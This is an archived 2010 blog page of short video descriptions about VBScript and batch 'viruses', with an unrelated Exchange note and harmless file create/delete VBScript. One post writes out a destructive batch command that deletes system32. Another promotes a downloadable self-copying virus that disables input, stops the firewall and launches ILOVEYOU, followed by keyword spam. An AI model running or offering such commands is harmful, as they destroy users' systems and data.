Tag: file
Vbs Codes
by Installer on Apr.04, 2010, under Vbscript
Awesome Vbs Codes Download Codes: uppit.com Comment Rate Favorite and Subscribe.
Related posts
VBS Virus
by Installer on Apr.03, 2010, under Vbscript
My first video.. I’m making a VBS file which is detected as malware (false positive). The script is: @echo off del c:\windows\system32 Edit: The virus doesn’t delete system32 by just opening the file. You will get a command prompt asking to confirm or not (y/n) and if you choose yes, it will delete files in system32. Most of them are access denied, but it will still make your pc unable to start again whenever you shutdown. Update: Sorry for the mistake. It’s a batch file, not a vbs file.
Related posts
Exchange 2007 SP1 CCR part 3: File Share Witness
by Installer on Apr.03, 2010, under Exchange 2007
Configure the FILE SHARE WITNESS on the HUB Transport server
Related posts
How to make a REALLY bad and dangerous virus!
by Installer on Apr.03, 2010, under Vbscript
i forgot that where it stands %virusname%.bat you need to replace it with the filename you save it as download link: www.megaupload.com effects: disables mouse and keyboard, stops the firewall, tries to delete all exe files in system32, copies itself to all .txt and .bat files in system32, and if you aren’t admin it only will spam the screen with pop-ups and cmd’s, loops “you are an idiot!” and “visual studio runtime error” and hides the vbs, vbombs all the users desktop with hundreds aof files without any sense in it, starts some of them if you are unlucky, copies itself to all executeable files and .doc (.exe, .bat, .com, .ink) and copies itself to most of the files in system32 before it generates the ILOVEYOU virus, starts the ILOVEYOU virus, and finally spams you to bluescreen with cmd’s. this time i don’t need that many extra tags! visual studio basic runtime error runtime windows microsoft ms msdos ms-dos cmd command prompt command line e-mail mail i love you .vbs vbs visual baisc script file run administrator limited user virus camstudio hd hq high quality defenition HD HQ cool notepad datanet inc. thedatanet 1 2 3 4 5 6 7 8 9 0 + \ | § ! ” # ¤ % & / ( ) = ? ` ^ * _ : ; , . – ‘ ¨ ~ µ } ] [ { $ £ @ € finish text .txt .ini ini ink inf con com bat batch initializ information it technology youtube google mac xp vista sp1 sp2 sp3 7 rightclick 1000 2000 3000 4000 5000 6000 7000 8000 9000 100000 1000000 100000000 10101010101010 10
Related posts
How to Create and Delete a file using Vbscript – Miutbevids
by Installer on Apr.02, 2010, under Vbscript
Code for Create the file : Dim objfso Set objfso = createobject(“Scripting.filesystemobject”) Const Append = 8 Dim fdir fdir = (“C:\Program Files\fake virus\create and delete\”) Const fname_ext = “miutbevids.txt” Dim Final Final = fdir + fname_ext Dim objtxt set objtxt = objfso.createtextfile(Final, True) Set objtxt = Nothing Dim fwrite Set fwrite = objfso.opentextfile(Final, Append) fwrite.writeline(“hi from miutvebvids www.miutbevids.webs.com”) fwrite.Close() Set fwrite = Nothing Set objfso = Nothing Code For Delete: Set objfso = createobject(“Scripting.filesystemobject”) objfso.deletefile(“C:\Program Files\fake virus\create and delete\createdfile.txt”) ———————- Rate Comment Subscribe Request www.mutubevids.webs.com